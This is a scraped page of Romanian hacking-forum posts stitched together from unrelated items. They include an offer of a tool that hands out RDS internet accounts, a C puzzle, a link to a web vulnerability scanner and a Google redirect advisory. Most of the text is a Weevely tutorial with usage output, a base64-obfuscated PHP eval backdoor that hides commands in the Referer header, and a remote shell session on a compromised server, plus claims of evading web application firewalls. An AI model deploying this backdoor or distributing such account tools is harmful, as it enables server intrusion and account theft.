Leaderboard

Deschizi programu, apesi butonul, si te alegi cu 2 usere rds. Just like that! Download : Download rcs-rds.rar from Sendspace.com - send big files the easy way Pass in PM Screen : Limit : 2 usere pe zi In baza de date sunt 100 de usere, in functie de comentarii voi mai adauga(sau nu) usere. +rep if you like it ;D P.S. Admin, daca postu asta incalca vreo regula si/sau "pune in danger" site-ul, sterge-l. UPDATE : +100 adaugate / 3 usr pe zi 1/19/2012 Userele nu mai sunt bune. Logarea este filtrata acum la RDS si te va deconecta automat daca userul logat nu corespunde cu adresa de pe contract. Imi pare rau dar nu mai are rost sa mai adaug usere. Closed!

Se da programul: #include <stdio.h> #include <conio.h> int main () { char * s = "start;*s=\"startcopiereint*startevalregx\x2ex86concon;rm-rf"; char*p=s; char c; // NU editati for-ul ce urmeaza for ( c=p[0]; c; c=*(++p) ) { printf("%c", c); } _getch(); } Cum ati modifica acest program astfel incat sa afiseze "rstcenter.com" ? PS: "concon" e legat fara nici un spatiu intre o si n un inteleg de unde mai apare un spatiu.

IrIsT Online Scanner Link : Online Scanner - IrIsT GrOuP- - IrIsT.Ir - Scan : RFI SQLI LFI ... tnx More : IrIsT Online Scanner

1. Romanian Security Team - [ Security Research ] v.2.0 Alpha 2. Romanian Security Team - [ Security Research ] v.2.0 Alpha Sursa via Full Disclosure: YGN Ethical Hacker Group Blog: Google: Malware URL Redirection (Google Arbitrary URL Redirect Vulnerability)

Generate and Manage Stealth PHP backdoors Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. With weevely you can generate PHP code to trojanize a web server, this backdoor acts like a telnet client to execute commands or inject addictional function on the backdoored server. Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review. The program trying to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server. Also the backdoor server code is small and easily hideable in other PHP files, the core is dynamically crypted in order to bypass pattern matching controls. Usage: Select All Code: root@bt:/weevely# ./main.py -h Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ Usage: main.py [options] Options: -h, --help show this help message and exit -g, --generate Generate backdoor crypted code, requires -o and -p . -o OUTPUT, --output=OUTPUT Output filename for generated backdoor . -c COMMAND, --command=COMMAND Execute a single command and exit, requires -u and -p . -t, --terminal Start a terminal-like session, requires -u and -p . -C CLUSTER, --cluster=CLUSTER Start in cluster mode reading items from the give file, in the form 'label,url,password' where label is optional. -p PASSWORD, --password=PASSWORD Password of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL . Choose your password and create the backdoor: Select All Code: root@bt:/weevely# ./main.py -g -p coco -o door.php Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file 'door.php' created with password 'coco'. root@bt:/weevely# ls -al door.php -rw-r--r-- 1 root root 321 2011-10-06 00:20 door.php root@bt:/weevely# cat door.php <?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3Bh cnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J2NvJy AmJiBjb3VudCgkYSk9PTkpIHtlY2hvICc8Y28+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3Jl cGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2 hvICc8L2NvPic7fQ==')); ?> Upload the backdoor to your customers web server and try to access it: Select All Code: root@bt:/weevely# ./main.py -t -u http://www.foo.org/.../door.php -p coco Weevely 0.3 Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Using method system(). + Retrieving terminal basic environment variables . [www@server /var/www] id uid=69(www) gid=69(www) groups=69(www) [www@server /var/www] pwd /var/www Voila! Furthermore, i tried to test weevely on servers that are protected from web application firewalls (specifically by Cloudflare and Imperva) and worked fine. Download Sursa

cu magneti neodym?